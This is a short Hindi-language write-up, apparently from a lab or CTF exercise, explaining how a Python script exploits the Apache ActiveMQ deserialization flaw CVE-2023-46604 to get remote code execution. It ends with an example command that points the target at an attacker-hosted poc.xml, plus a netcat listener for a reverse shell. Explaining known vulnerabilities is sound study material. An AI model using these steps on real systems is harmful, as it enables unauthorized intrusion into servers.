
स्क्रिप्ट Apache ActiveMQ (CVE-2023-46604) में असुरक्षित डिसीरियलाइज़ेशन भेद्यता का शोषण करती है
हमले का तकनीकी सारांश: CVE-2023-46604
स्क्रिप्ट Apache ActiveMQ (CVE-2023-46604) में एक असुरक्षित डिसीरियलाइज़ेशन भेद्यता का शोषण करती है ताकि लक्ष्य सर्वर पर रिमोट कोड निष्पादन प्राप्त किया जा सके। शोषण प्रक्रिया का विवरण
भेद्यता का लक्ष्य:
यह भेद्यता Apache ActiveMQ के OpenWire प्रोटोकॉल में मौजूद है।
यह ऑब्जेक्ट्स के असुरक्षित डिसीरियलाइज़ेशन की अनुमति देता है, जिसका उपयोग सर्वर पर मनमाना कोड निष्पादित करने के लिए किया जा सकता है।
पूर्वापेक्षाएँ:
ActiveMQ सर्वर तक नेटवर्क पहुंच।
एक दुर्भावनापूर्ण XML फ़ाइल (poc.xml) जो लक्ष्य सर्वर के लिए सुलभ URL के माध्यम से उपलब्ध हो।
हमले के घटक:
Python स्क्रिप्ट: ActiveMQ सर्वर पर दुर्भावनापूर्ण पेलोड भेजने की प्रक्रिया को स्वचालित करती है।
XML फ़ाइल (poc.xml): इसमें एक Spring बीन होता है जो एक दुर्भावनापूर्ण कमांड (उदाहरण के लिए, रिवर्स शेल खोलना) का निष्पादन परिभाषित करता है।
हमले के चरण
पेलोड तैयार करना:
स्क्रिप्ट एक हेक्साडेसिमल संदेश बनाती है जिसमें शामिल है:
जावा वर्ग का नाम: org.springframework.context.support.ClassPathXmlApplicationContext.
दुर्भावनापूर्ण XML फ़ाइल का URL.
पेलोड को बाइट्स के अनुक्रम में परिवर्तित किया जाता है जिसे OpenWire प्रोटोकॉल के माध्यम से भेजा जा सकता है।
पेलोड भेजना:
स्क्रिप्ट निर्दिष्ट पोर्ट (डिफ़ॉल्ट 61616) पर ActiveMQ सर्वर के लिए एक TCP सॉकेट कनेक्शन खोलती है।
सर्वर को दुर्भावनापूर्ण पेलोड भेजती है।
दुर्भावनापूर्ण कोड का निष्पादन:
ActiveMQ सर्वर पेलोड में निर्दिष्ट ऑब्जेक्ट को डिसीरियलाइज़ करता है।
असुरक्षित डिसीरियलाइज़ेशन के कारण, XML फ़ाइल में परिभाषित Spring बीन लोड और निष्पादित होता है।
यह बीन सर्वर पर एक दुर्भावनापूर्ण कमांड (उदाहरण के लिए, रिवर्स शेल) निष्पादित करता है।
_________________________________________________________
निष्पादन उदाहरण:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
यह स्क्रिप्ट स्पेनिश में कॉपी और संशोधित की गई थी:https://github.com/evkl1d/CVE-2023-46604.git